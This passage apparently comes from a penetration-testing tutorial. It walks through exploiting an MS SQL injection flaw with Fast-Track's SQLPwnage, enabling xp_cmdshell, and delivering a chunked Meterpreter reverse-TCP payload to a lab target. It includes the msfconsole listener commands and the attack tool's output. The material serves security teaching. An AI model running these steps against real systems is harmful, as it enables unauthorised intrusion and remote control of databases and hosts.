We’ll use SQLPwnage to deploy the Meterpreter console via SQL injection on the target to gain administrative access to its backend database. Recall from Chapter 11 that SQLPwnage is an automated way of attacking MS SQL–based injection flaws, and it uses multiple methods of attack in an attempt to fully compromise the SQL server via the xp_cmdshell stored procedure.
Before launching the attack, we need to set up some options through msfconsole. For practice, let’s create our own Metasploit listener manually. Fast-Track can set it up for you, but we will be adding the load auto_add_route 
function within Metasploit so that we can automatically connect to systems on the internal network. We’ll create a listener and launch Fast-Track to attack the system.
root@bt:/opt/framework3/msf3#msfconsolemsf >use multi/handlermsf exploit(handler) >set payload windows/meterpreter/reverse_tcppayload => windows/meterpreter/reverse_tcp msf exploit(handler) >set LHOST 172.16.32.129LHOST => 172.16.32.129 smsf exploit(handler) >set LPORT 443LPORT => 443load auto_add_route[*] Successfully loaded plugin: auto_add_route msf exploit(handler) >exploit -j[*] Exploit running as background job. [*] Started reverse handler on 172.16.32.129:443 [*] Starting the payload handler... msf exploit(handler) >
With our listener waiting for a connection from our soon-to-be compromised target, we launch Fast-Track. (When the xterm window opens, close it since we already have a listener set up.)
[+] Importing 64kb debug bypass payload into Fast-Track... [+] [+] Import complete, formatting the payload for delivery.. [+] [+] Payload Formatting prepped and ready for launch. [+] [+] Executing SQL commands to elevate account permissions. [+] [+] Initiating stored procedure: 'xp_cmdhshell' if disabled. [+] [+] Delivery Complete. [+] Launching MSFCLI Meterpreter Handler Creating Metasploit Reverse Meterpreter Payload.. Created by msfpayload (http://www.metasploit.com). Payload: windows/meterpreter/reverse_tcp Length: 290 Options: LHOST=172.16.32.129,LPORT=443 Taking raw binary and converting to hex. Raw binary converted to straight hex. [+] Bypassing Windows Debug 64KB Restrictions. Evil. [+] [+] Sending chunked payload. Number 1 of 9. This may take a bit. [+] [+] Sending chunked payload. Number 2 of 9. This may take a bit. [+]. . . SNIP . . .[+] Conversion from hex to binary in progress. [+] [+] Conversion complete. Moving the binary to an executable. [+] [+] Splitting the hex into 100 character chunks [+] [+] Split complete. [+] [+] Prepping the payload for delivery. [+] Sending chunk 1 of 8, this may take a bit... Sending chunk 2 of 8, this may take a bit.... . . SNIP . . .Using H2B Bypass to convert our Payload to Binary.. Running cleanup before launching the payload.... [+] Launching the PAYLOAD!! This may take up to two or three minutes. [+]
This should look familiar. We’ve essentially attacked the web application through Fast-Track and exploited it via SQL injection attacks. We used the xp_cmdshell stored procedure and the binary-to-hex conversion technique to present a full-fledged Meterpreter shell.